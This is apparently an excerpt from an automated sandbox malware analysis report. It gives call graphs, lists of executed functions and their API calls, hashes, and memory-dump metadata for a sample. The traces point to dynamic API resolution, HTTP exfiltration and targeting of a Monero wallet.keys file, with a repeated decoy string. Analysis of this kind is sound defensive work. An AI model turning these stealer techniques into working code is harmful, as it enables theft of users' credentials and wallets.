6aa9b0 4 API calls 15914->15915 15916 695444 15915->15916 15917 6aa8a0 lstrcpy 15916->15917 15918 69544d 15917->15918 15919 6aa9b0 4 API calls 15918->15919 15920 69546e 15919->15920 15921 6aa8a0 lstrcpy 15920->15921 16013 6a8ea9 16012->16013 16014 6a8ead CryptBinaryToStringA 16012->16014 16013->15858 16014->16013 16015 6a8ece GetProcessHeap RtlAllocateHeap 16014->16015 16015->16013 16016 6a8ef4 codecvt 16015->16016 16017 6a8f05 CryptBinaryToStringA 16016->16017 16017->16013 16021->15294 16264 699880 16022->16264 16024 6998e1 16024->15301 16026 6aa740 lstrcpy 16025->16026 16199 6aa740 lstrcpy 16198->16199 16200 6a0266 16199->16200 16201 6a8de0 2 API calls 16200->16201 16202 6a027b 16201->16202 16203 6aa920 3 API calls 16202->16203 16204 6a028b 16203->16204 16205 6aa8a0 lstrcpy 16204->16205 16206 6a0294 16205->16206 16207 6aa9b0 4 API calls 16206->16207 16265 69988e 16264->16265 16268 696fb0 16265->16268 16267 6998ad codecvt 16267->16024 16271 696d40 16268->16271 16272 696d59 16271->16272 16273 696d63 16271->16273 16272->16267 16287 696530 16273->16287 16277 696dbe 16277->16272 16297 6969b0 16277->16297 16279 696e2a 16279->16272 16280 696ef7 16279->16280 16281 696ee6 VirtualFree 16279->16281 16282 696f38 16280->16282 16283 696f26 FreeLibrary 16280->16283 16286 696f41 16280->16286 16281->16280 16285 6a89f0 2 API calls 16282->16285 16283->16280 16284 6a89f0 2 API calls 16284->16272 16285->16286 16286->16272 16286->16284 16288 696542 16287->16288 16290 696549 16288->16290 16307 6a8a10 GetProcessHeap RtlAllocateHeap 16288->16307 16290->16272 16291 696660 16290->16291 16294 69668f VirtualAlloc 16291->16294 16293 696730 16295 69673c 16293->16295 16296 696743 VirtualAlloc 16293->16296 16294->16293 16294->16295 16295->16277 16296->16295 16298 6969c9 16297->16298 16302 6969d5 16297->16302 16299 696a09 LoadLibraryA 16298->16299 16298->16302 16300 696a32 16299->16300 16299->16302 16304 696ae0 16300->16304 16308 6a8a10 GetProcessHeap RtlAllocateHeap 16300->16308 16302->16279 16303 696ba8 GetProcAddress 16303->16302 16303->16304 16304->16302 16304->16303 16305 6a89f0 2 API calls 16305->16304 16306 696a8b 16306->16302 16306->16305 16307->16290 16308->16306

                        Executed Functions

                        Function 006A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 6a9860-6a9874 call 6a9750 663 6a987a-6a9a8e call 6a9780 GetProcAddress * 21 660->663 664 6a9a93-6a9af2 LoadLibraryA * 5 660->664 663->664 666 6a9b0d-6a9b14 664->666 667 6a9af4-6a9b08 GetProcAddress 664->667 669 6a9b46-6a9b4d 666->669 670 6a9b16-6a9b41 GetProcAddress * 2 666->670 667->666 671 6a9b68-6a9b6f 669->671 672 6a9b4f-6a9b63 GetProcAddress 669->672 670->669 673 6a9b89-6a9b90 671->673 674 6a9b71-6a9b84 GetProcAddress 671->674 672->671 675 6a9b92-6a9bbc GetProcAddress * 2 673->675 676 6a9bc1-6a9bc2 673->676 674->673 675->676
                        APIs
                        • GetProcAddress.KERNEL32(75900000,01260C18), ref: 006A98A1
                        • GetProcAddress.KERNEL32(75900000,01260EB8), ref: 006A98BA
                        • GetProcAddress.KERNEL32(75900000,01260ED0), ref: 006A98D2
                        • GetProcAddress.KERNEL32(75900000,01260C30), ref: 006A98EA
                        • GetProcAddress.KERNEL32(75900000,01260C48), ref: 006A9903
                        • GetProcAddress.KERNEL32(75900000,01268F70), ref: 006A991B
                        • GetProcAddress.KERNEL32(75900000,01255480), ref: 006A9933
                        • GetProcAddress.KERNEL32(75900000,012553C0), ref: 006A994C
                        • GetProcAddress.KERNEL32(75900000,01260D80), ref: 006A9964
                        • GetProcAddress.KERNEL32(75900000,01260C60), ref: 006A997C
                        • GetProcAddress.KERNEL32(75900000,01260CA8), ref: 006A9995
                        • GetProcAddress.KERNEL32(75900000,01260D98), ref: 006A99AD
                        • GetProcAddress.KERNEL32(75900000,01255400), ref: 006A99C5
                        • GetProcAddress.KERNEL32(75900000,01260CC0), ref: 006A99DE
                        • GetProcAddress.KERNEL32(75900000,01260CD8), ref: 006A99F6
                        • GetProcAddress.KERNEL32(75900000,012554C0), ref: 006A9A0E
                        • GetProcAddress.KERNEL32(75900000,01260CF0), ref: 006A9A27
                        • GetProcAddress.KERNEL32(75900000,01260F90), ref: 006A9A3F
                        • GetProcAddress.KERNEL32(75900000,01255420), ref: 006A9A57
                        • GetProcAddress.KERNEL32(75900000,01260FA8), ref: 006A9A70
                        • GetProcAddress.KERNEL32(75900000,012554E0), ref: 006A9A88
                        • LoadLibraryA.KERNEL32(01260EE8,?,006A6A00), ref: 006A9A9A
                        • LoadLibraryA.KERNEL32(01260F00,?,006A6A00), ref: 006A9AAB
                        • LoadLibraryA.KERNEL32(01260F18,?,006A6A00), ref: 006A9ABD
                        • LoadLibraryA.KERNEL32(01260F30,?,006A6A00), ref: 006A9ACF
                        • LoadLibraryA.KERNEL32(01260F48,?,006A6A00), ref: 006A9AE0
                        • GetProcAddress.KERNEL32(75070000,01260F60), ref: 006A9B02
                        • GetProcAddress.KERNEL32(75FD0000,01260F78), ref: 006A9B23
                        • GetProcAddress.KERNEL32(75FD0000,01269528), ref: 006A9B3B
                        • GetProcAddress.KERNEL32(75A50000,01269540), ref: 006A9B5D
                        • GetProcAddress.KERNEL32(74E50000,01255500), ref: 006A9B7E
                        • GetProcAddress.KERNEL32(76E80000,01268F80), ref: 006A9B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 006A9BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 006A9BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 8f22a602f135059826f9d293958458230c9651aaf97789bf704b012c12253815
                        • Instruction ID: 1bd45dde8bb29b977586d0184707eef98793eb8730a4ec1a61e87fa801f861ab
                        • Opcode Fuzzy Hash: 8f22a602f135059826f9d293958458230c9651aaf97789bf704b012c12253815
                        • Instruction Fuzzy Hash: D9A17CB56022419FD34CEFA8FD8896637F9F74C301734472BAA45C3264DB399941DB26
                        Function 006945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 6945c0-694695 RtlAllocateHeap 781 6946a0-6946a6 764->781 782 6946ac-69474a 781->782 783 69474f-6947a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0069460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0069479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 3bea84680bd9d18ff54bd1c36ce7b5993eeae270834b28e3065fe50196952860
                        • Instruction ID: a4f3f6c0d55dc835d0ce48a5947e0288ae36bd600658eb1a1cf32d4e85ad3dfd
                        • Opcode Fuzzy Hash: 3bea84680bd9d18ff54bd1c36ce7b5993eeae270834b28e3065fe50196952860
                        • Instruction Fuzzy Hash: B041E8A07C5E89EECE25B7A4A85EFDD7B976FCA700F515044E80B52282CFF16580472B
                        Function 00694880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 694880-694942 call 6aa7a0 call 6947b0 call 6aa740 * 5 InternetOpenA StrCmpCA 816 69494b-69494f 801->816 817 694944 801->817 818 694ecb-694ef3 InternetCloseHandle call 6aaad0 call 699ac0 816->818 819 694955-694acd call 6a8b60 call 6aa920 call 6aa8a0 call 6aa800 * 2 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa920 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa920 call 6aa8a0 call 6aa800 * 2 InternetConnectA 816->819 817->816 829 694f32-694fa2 call 6a8990 * 2 call 6aa7a0 call 6aa800 * 8 818->829 830 694ef5-694f2d call 6aa820 call 6aa9b0 call 6aa8a0 call 6aa800 818->830 819->818 905 694ad3-694ad7 819->905 830->829 906 694ad9-694ae3 905->906 907 694ae5 905->907 908 694aef-694b22 HttpOpenRequestA 906->908 907->908 909 694b28-694e28 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa920 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa920 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa920 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa9b0 call 6aa8a0 call 6aa800 call 6aa920 call 6aa8a0 call 6aa800 call 6aa740 call 6aa920 * 2 call 6aa8a0 call 6aa800 * 2 call 6aaad0 lstrlen call 6aaad0 * 2 lstrlen call 6aaad0 HttpSendRequestA 908->909 910 694ebe-694ec5 InternetCloseHandle 908->910 1021 694e32-694e5c InternetReadFile 909->1021 910->818 1022 694e5e-694e65 1021->1022 1023 694e67-694eb9 InternetCloseHandle call 6aa800 1021->1023 1022->1023 1025 694e69-694ea7 call 6aa9b0 call 6aa8a0 call 6aa800 1022->1025 1023->910 1025->1021
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                          • Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00694915
                        • StrCmpCA.SHLWAPI(?,0126FA00), ref: 0069493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00694ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006B0DDB,00000000,?,?,00000000,?,",00000000,?,0126F9E0), ref: 00694DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00694E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00694E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00694E49
                        • InternetCloseHandle.WININET(00000000), ref: 00694EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00694EC5
                        • HttpOpenRequestA.WININET(00000000,0126FA50,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00694B15
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • InternetCloseHandle.WININET(00000000), ref: 00694ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: d681f26ba7cf1b58db97257ae734667970e731251b33b39f094a772c81227995
                        • Instruction ID: 27312c19a6e58bc3d9b7a82d810b968978df1e94c97fbdf52b73f32fecc61a9c
                        • Opcode Fuzzy Hash: d681f26ba7cf1b58db97257ae734667970e731251b33b39f094a772c81227995
                        • Instruction Fuzzy Hash: 7D12EC71911118AADB95FB90DC92FEEB37ABF16300F50419EB10662091EF742F49CF6A
                        Function 006A7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 574eb58f73ca0e942a920a109cf9a1391c107475e5642d7c7b0e28c542da69f9
                        • Instruction ID: 70615cbb819b5257068453752ff466819592e5bb714788ae7a61141832d6e8c0
                        • Opcode Fuzzy Hash: 574eb58f73ca0e942a920a109cf9a1391c107475e5642d7c7b0e28c542da69f9
                        • Instruction Fuzzy Hash: FBF04FB1944208ABC704DF98DD49BAEBBB8FB05711F10026AFA05A2680C77919048BA1
                        Function 00691160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
